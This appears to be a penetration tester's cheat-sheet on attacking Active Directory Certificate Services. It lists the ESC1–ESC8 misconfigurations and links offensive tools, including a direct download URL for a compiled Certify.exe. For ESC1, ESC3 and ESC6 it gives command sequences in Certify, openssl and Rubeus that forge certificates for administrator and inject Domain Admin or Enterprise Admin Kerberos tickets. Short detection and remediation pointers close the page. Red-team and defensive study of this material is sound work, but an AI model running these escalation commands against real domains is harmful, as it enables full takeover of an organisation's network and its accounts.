AD CS

PKI ?

nxc ldap <ip> -u user -p pass -M adcs

Exploit ESC8 (ADCS) | NetExec

Or run PingCastle or Certify

ESC

Active Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable MessShellph1sh's Blog

Escalation	Definition
ESC1	Enrolee can request cert for ANY user
ESC2	Any purpose or no EKU (potentially dangerous)
ESC3	Request an enrollement agent certificate and use it to request cert on behalf of ANY user
ESC4	Overly permissive ACLs on templates
ESC5	Poor access control on CA server, CA server computer object, etc.
ESC6	EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user
ESC7	Poor access control on roles on CA authority like "CA Administrator" and "Certificate Manager"
ESC8	NTLM relay to HTTP enrollement endpoints

NXC - Masky

If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT

Source: https://x.com/mpgn_x64/status/1584863925744521216

Tools

Locksmith

GitHub - TrimarcJake/Locksmith: A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate ServicesGitHub

# Run all scans
Invoke-Locksmith -Scan All

Certify

GitHub - GhostPack/Certify: Active Directory certificate abuse.GitHub

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/Certify.exe

Enumeration

AD CS in the target forest

Certify.exe cas

Templates

Certify.exe find

Vulnerabel templates

Certify.exe find /vulnerable

Certipy

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Metasploit

Attacking AD CS ESC Vulnerabilities Using MetasploitMetasploit Documentation Penetration Testing Software, Pen Testing Security

ADCSKiller

GitHub - grimlockx/ADCSKiller: An ADCS Exploitation Automation Tool Weaponizing Certipy and CoercerGitHub

Practice and explanation

GitHub - arth0sz/Practice-AD-CS-Domain-Escalation: Introductory guide on the configuration and subsequent exploitation of Active Directory Certificate Services with Certipy. Based on the white paper Certified Pre-Owned.GitHub

GOAD - part 6 - ADCSMayfly

ESC1

Active Directory Certificate Services (ADCS -ESC1) | RBT SecurityRBT Security | Reinventing The Security

"VulnTemplate" has ENROLLEE_SUPPLIES_SUBJECT value for msPKI-Certificates-Name-Flag

Certify.exe find /enrolleeSuppliesSubject

"VulnTemplate" allows enrollment to RDPUsers group.

1. Request a certificate for DA (or EA) as a user1 (member of RDP group)

Certify.exe request /ca:dc.parent.local\DC-CA /template:"VulnTemplate" /altname:administrator

1. Convert cert.pem to pfx and use it to request a TGT for DA (or EA)

Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:passw0rd /ptt

ESC3

Request an enrollement agent certificate and use it to request cert on behalf of ANY user

Active Directory Certificate Services (ADCS – ESC3) | RBT SecurityRBT Security | Reinventing The Security

"VulnTemplateEnrollement-Agent" allows Domain users to enroll and has 'Certificate Request Agent' EKU

"VulnTemplateEnrollement-Users" has an Application Policy Issuance Requirement of Certificate Request Agent and has an EKU that allows for domain authentication

Escalation to DA

child.parent.local: child domain

parent.local: parent domain

1. Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Agent

1. Convert cert.pem to pfx and use it to request a cert on behalf on DA using "VulnTemplateEnrollement-Users"

openssl.exe pkcs12 -in C:\path\to\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3agent.pfx 

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:child\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd

1. Convert from cert.pem to pfx, request DA TGT and inject it

openssl.exe pkcs12 -in C:\path\to\DA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3user-DA.pfx  

Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx /password:passw0rd /ptt

Escalation to EA

1. Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template - see Escalation to DA

2. Convert cert.pem to pfx and use it to request a cert on behalf on EA using "VulnTemplateEnrollement-Users

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:parent.local\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd

1. Request EA TGT and inject it

Rubeus.exe asktgt /user:parent.local\administrator /certificate:esc3user-EA.pfx /dc:dc.parent.local /password:passw0rd /ptt

ESC6

EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user from a template that allow enrollment to low-priv user

Active Directory Certificate Attack (ADCS – ESC6) | RBT SecurityRBT Security | Reinventing The Security

"Vuln-Integration" grants enrollment to RDPUsers group.

1. Request a certificate for DA (or EA) as a user1 (member of RDP group)

Certify.exe request /ca:dc.parent.local\DC-CA /template:"Vuln-Integration" /altname:administrator

1. Convert cert.pem to pfx and use it to request a TGT for DA (or EA)

Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:passw0rd /ptt

ESC8 - PetitPotam

NTLM relay to HTTP enrollement endpoints

Release PetitPotato · wh0amitz/PetitPotatoGitHub

Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints - Hacking ArticlesHacking Articles

Windows Exploit

Certfifried - CVE-2022-26923

Exploiting Certifried (CVE-2022-26923) | CravateRouge LtdCravateRouge Ltd

Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923)Medium

ADCSCoercePotato

GitHub - decoder-it/ADCSCoercePotatoGitHub

Hello: I’m your ADCS server and I want to authenticate against youDecoder's Blog

CertPotato

SensePost | Certpotato – using adcs to privesc from virtual and network service accounts to local system

KrbRelay-SMBServer

GitHub - decoder-it/KrbRelay-SMBServerGitHub

ADCS ESC15 (EKUwu)

Detection: Bloodhound query

MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p

Credit: @SpecterOps

Relay Attack on WinReg RPC Client

Call and Register — Relay Attack on WinReg RPC Client | AkamaiAkamai Technologies

akamai-security-research/PoCs/cve-2024-43532 at main · akamai/akamai-security-researchGitHub

Remediation

https://www.nccgroup.com/us/research-blog/defending-your-directory-an-expert-guide-to-fortifying-active-directory-certificate-services-adcs-against-exploitation/www.nccgroup.com

GitHub - Sleepw4lker/TameMyCerts: Policy Module for Microsoft Active Directory Certificate ServicesGitHub